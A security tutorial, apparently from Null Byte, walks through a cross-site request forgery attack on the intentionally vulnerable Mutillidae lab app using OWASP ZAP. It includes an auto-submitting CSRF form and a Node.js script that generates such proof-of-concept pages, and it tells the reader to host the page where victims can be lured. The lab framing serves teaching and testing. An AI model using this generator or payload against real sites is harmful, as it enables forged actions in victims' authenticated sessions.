
How to Abuse Session Management with OWASP ZAP (Null Byte :: WonderHowTo)



It's always a good idea to know how an attack works at the most basic level. Manual techniques often find holes that even the most sophisticated tool cannot. Sometimes, though, one of these tools can make the job a lot easier, especially when you already have a solid understanding of what it is doing for you. One such tool can help us carry out a cross-site request forgery (CSRF) with minimal effort.

Introduction to OWASP ZAP

The OWASP Zed Attack Proxy (ZAP) is a popular open-source web application security scanner developed by the OWASP project. It is a Java-based tool with a convenient GUI, and it ships with Kali Linux. Besides its scanner, which automatically detects many vulnerabilities, it includes many useful features for manual testing such as spidering, fuzzing, and proxying.

The right-hand pane of ZAP holds the scanner functionality: enter a valid URL and click "Attack". The same pane also shows the details of individual requests and responses.

The left-hand pane shows the layout of a site after scanning or spidering; this is useful for picking out individual pages and getting a comprehensive overview of the site's content. Finally, the bottom pane of ZAP holds the request history, the search function, and any alerts raised during a test.

In this tutorial, we use ZAP as a proxy to intercept traffic. Once our browser is set to a manual proxy configuration, ZAP acts as the proxy automatically; this makes it easy to view and modify the requests sent to the application under test.

Step 1: Configure the Environment

For this demonstration, we use the deliberately vulnerable web application Mutillidae, which is included in the Metasploitable 2 virtual machine. OWASP ZAP is used to intercept the requests and turn one of them into a CSRF attack.

To replicate this attack, we need two different users. Create an account for each of them by visiting the registration page, substituting the appropriate IP address:

  http://172.16.1.102/mutildae/index.php?page=register.php 

Here we create user1 with the password password:

and, similarly, user2 with the password hunter2:

Now we can log in as user1 by visiting the login page:

Before starting ZAP, we need to make sure the browser is configured to route its traffic through the proxy. In Firefox, go to "Settings", click "Advanced", then "Network", and finally "Settings". Set the proxy configuration to manual and use 127.0.0.1 (localhost) on port 8080, which is ZAP's default listening port. Tick "Use this proxy server for all protocols" and make sure nothing is listed under "No proxy for". Click "OK" and we are ready to open ZAP.

Step 2: Open ZAP

When ZAP starts, it asks how we want to persist the session. For now we can just accept the default, which does not persist the session:

Now, in our web application, go to the following URL to add a blog entry for user1:

  http://172.16.1.102/mutildae/index.php?page=add-to-your-blog.php 

Enter whatever text you like and click "Save Blog Entry" to add the entry:

Since ZAP is already listening as a proxy, we can see the request appear in the history at the bottom of the window:

This shows information such as the URL, the server's response code, the request size, and the HTTP method used. In the upper-right pane of ZAP, we can inspect the request itself by clicking the "Request" tab:

This gives us a little more detail, including any cookies or tokens in play as well as the text we submitted to the blog.

Step 3: Launching the CSRF Attack

In the previous tutorial we learned how to modify HTML to craft a trick page that makes unsuspecting users submit malicious data on our behalf. ZAP is useful here because it has a feature that essentially automates that step for us.

Note that this feature generates a demo form with a visible submit button. A more realistic attack would modify that form so it submits itself automatically when the page loads, as in the previous article. In essence, these are two ways of reaching the same goal.

Right-click the intercepted request and choose "Generate Anti-CSRF Test FORM", which opens the generated form in a new tab:

This form contains the parameters and values of the POST request, and an attacker can modify them freely. To carry out the attack, a little JavaScript submits the form automatically as soon as the page loads. The generated form, with the onload handler added, has the following shape (the field values are copied from the intercepted request; only the action URL and field names survived in this copy of the article):

  <html>
  <body onload="document.forms[0].submit()">
  <form method="POST" action="http://172.16.1.102/mutildae/index.php?page=add-to-your-blog.php">
    <!-- values copied from the intercepted POST -->
    <input type="hidden" name="add-to-your-blog-php-submit-button" value="...">
    <input type="hidden" name="blog_entry" value="...">
    <input type="hidden" name="csrf-token" value="...">
    <input type="submit" value="Submit">
  </form>
  </body>
  </html>
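To make the generation step itself visible, here is an added example (Node.js) that is not code from the article or from ZAP: a small re-implementation of what the "Generate Anti-CSRF Test FORM" feature does. Given the action URL and the URL-encoded POST body captured through the proxy, it emits an HTML page whose form re-sends those parameters, and with autoSubmit it also fires on load, which is the weaponised variant described above. The captured body is constructed for the example (the csrf-token value is made up); in practice it would be copied from ZAP's Request tab.

```javascript
// Added example (Node.js), not code from the article or from ZAP itself: a small
// re-implementation of ZAP's "Generate Anti-CSRF Test FORM" step. Given the
// action URL and the POST body captured from the proxied request, it emits an
// HTML page whose form re-sends those parameters; with autoSubmit it also fires
// on load. The sample body below is constructed (the token value is made up).

// Escape a string for placement inside a double-quoted HTML attribute.
// Without this, a captured value containing a quote would break out of the
// attribute and corrupt the generated form.
function escapeHtmlAttr(value) {
  return String(value)
    .replace(/&/g, '&amp;')
    .replace(/"/g, '&quot;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;');
}

// Parse an application/x-www-form-urlencoded body, as shown in the proxy, into
// an ordered list of [name, value] pairs (URLSearchParams handles %xx and '+').
function parseFormBody(body) {
  return Array.from(new URLSearchParams(body).entries());
}

// Build the proof-of-concept page. autoSubmit=false reproduces the demo form
// with a visible button; autoSubmit=true adds the onload submission.
function buildCsrfPoc(action, body, autoSubmit) {
  const inputs = parseFormBody(body)
    .map(([name, value]) =>
      `    <input type="hidden" name="${escapeHtmlAttr(name)}" value="${escapeHtmlAttr(value)}">`)
    .join('\n');
  const onload = autoSubmit ? ' onload="document.forms[0].submit()"' : '';
  return [
    '<!DOCTYPE html>',
    '<html>',
    `<body${onload}>`,
    `  <form method="POST" action="${escapeHtmlAttr(action)}">`,
    inputs,
    '    <input type="submit" value="Submit">',
    '  </form>',
    '</body>',
    '</html>',
  ].join('\n');
}

// Constructed sample: the blog-post request from the walkthrough, with a
// made-up csrf-token value and a blog entry that contains quote characters.
const SAMPLE_ACTION = 'http://172.16.1.102/mutildae/index.php?page=add-to-your-blog.php';
const SAMPLE_BODY =
  'csrf-token=a1b2c3&blog_entry=Posted+by+the+attacker+%22in+your+name%22' +
  '&add-to-your-blog-php-submit-button=Save+Blog+Entry';

console.log(buildCsrfPoc(SAMPLE_ACTION, SAMPLE_BODY, true));
```

Save the output as an HTML file and host it anywhere the victim can be lured to; the browser will attach the victim's session cookie when the form posts back to the target, which is exactly what makes the request pass as the victim's own. The attribute escaping matters even in an attacker's tool: a captured value containing a double quote would otherwise truncate the form and silently drop parameters.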

This example is just a harmless blog post, but a more malicious attack could target banking details or other private information.

Next, we go back to the login page and log in as user2, who plays the victim of this attack. In reality this would be some other user who visits our trick page, but for demonstration purposes we log in and play the victim ourselves. Once the form loads and the request goes through, we can see the blog entry crafted by user1 appear under user2's current entries:

Again, nothing here is malicious in itself, but improper session handling was abused to forge a cross-site request. If the application held more sensitive data, an attacker could quickly exploit this weakness for personal or financial gain.

Concluding Remarks

OWASP ZAP is a powerful tool for testing web applications for common vulnerabilities. In this guide, we used one of its many manual-testing features to intercept traffic and carry out a CSRF attack. While this example was trivial in that we only forged a blog post, real-world scenarios can be far more damaging, especially when personal or financial data is involved.

In the 2017 edition of the OWASP Top 10, CSRF was dropped from the list of the most critical web application security risks. This is largely because so many applications have moved to frameworks that protect against CSRF automatically. But even though it has fallen off the top ten, CSRF remains a legitimate security issue to this day. Plenty of websites still neglect basic security, and sooner or later you will cross paths with this vulnerability.


Cover image by skeeze/Pixabay; screenshots by drd_/Null Byte
